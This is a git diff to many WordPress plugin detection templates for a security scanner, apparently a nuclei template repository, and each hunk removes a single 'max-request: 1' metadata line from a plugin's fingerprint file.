diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
